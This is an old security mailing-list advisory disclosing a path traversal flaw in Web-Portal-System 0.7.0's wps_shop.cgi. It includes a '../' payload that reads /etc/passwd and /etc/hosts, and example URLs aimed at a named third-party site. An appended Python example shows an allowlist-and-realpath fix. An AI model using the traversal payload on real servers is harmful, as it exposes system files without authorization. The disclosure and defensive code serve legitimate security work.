Related information
PHP, ASP, CGI web applications security vulnerabilities
[HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch
[SA15985] USANet Creations Products Shell Command Injection Vulnerability
[SA15857] Emilda User Management Security Bypass Vulnerability
[SA15967] Phpauction GPL Multiple Vulnerabilities

From: durito <durito_(at)_mail.ru>
Date: 16.07.2005
Subject: file viewing in Web-Portal-System 0.7.0

Hello, zaraza.

I found a vulnerability in Web-Portal-System 0.7.0: in the wps_shop.cgi script, the art parameter allows viewing arbitrary files on the server.

Exploit:
wps_shop.cgi?action=showartikel&cat=kategorie_1&art=../../../../../../../../etc/passwd

Example:
http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=showartikel&cat=kategorie_1&art=../../../../../../../../etc/passwd
http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=showartikel&cat=kategorie_1&art=../../../../../../../../etc/hosts

--
Best regards,
durito [LwB Security Team]
mailto:durito@mail.ru
http://lwb57.org
http://durito.narod.ru
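
The server-side check that closes this class of bug, as an added example that is not part of the original message and is not Web-Portal-System code. It is written in Python for illustration and assumes articles are stored as files under base/cat/art; the names resolve_article and RejectedPath and the directory layout are hypothetical, and the sample tree is constructed.

```python
import os
import re
import tempfile

# Assumption: article files live under <base>/<cat>/<art>. The advisory does
# not show the real storage layout of Web-Portal-System.
# One path component only: no "/", no "\", no NUL, no leading "." or "-".
_SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


class RejectedPath(ValueError):
    """Raised when request parameters would leave the article directory."""


def resolve_article(base_dir, cat, art):
    """Map the cat/art request parameters to a file confined to base_dir."""
    for name in (cat, art):
        # Layer 1: allowlist the parameter instead of stripping "../".
        if not _SAFE_NAME.fullmatch(name):
            raise RejectedPath(f"illegal name: {name!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, cat, art))
    # Layer 2: after symlink resolution the file must still sit under base.
    if os.path.commonpath([base, candidate]) != base:
        raise RejectedPath("resolved path escapes the base directory")
    if not os.path.isfile(candidate):
        raise RejectedPath("no such article")
    return candidate


def demo():
    """Build a constructed tree, then try one valid and two hostile requests."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "shop")
        os.makedirs(os.path.join(base, "kategorie_1"))
        with open(os.path.join(base, "kategorie_1", "artikel_1"), "w") as fh:
            fh.write("constructed sample article\n")
        # A symlink inside the tree that points outside it.
        os.symlink(root, os.path.join(base, "kategorie_1", "link"))
        for art in ("artikel_1", "../../../../../../../../etc/passwd", "link"):
            try:
                resolve_article(base, "kategorie_1", art)
                results[art] = "served"
            except RejectedPath:
                results[art] = "rejected"
    return results
```

The allowlist rejects the traversal string before any filesystem call, and the realpath comparison covers the case the allowlist cannot see, a legal-looking name that is a symlink out of the tree.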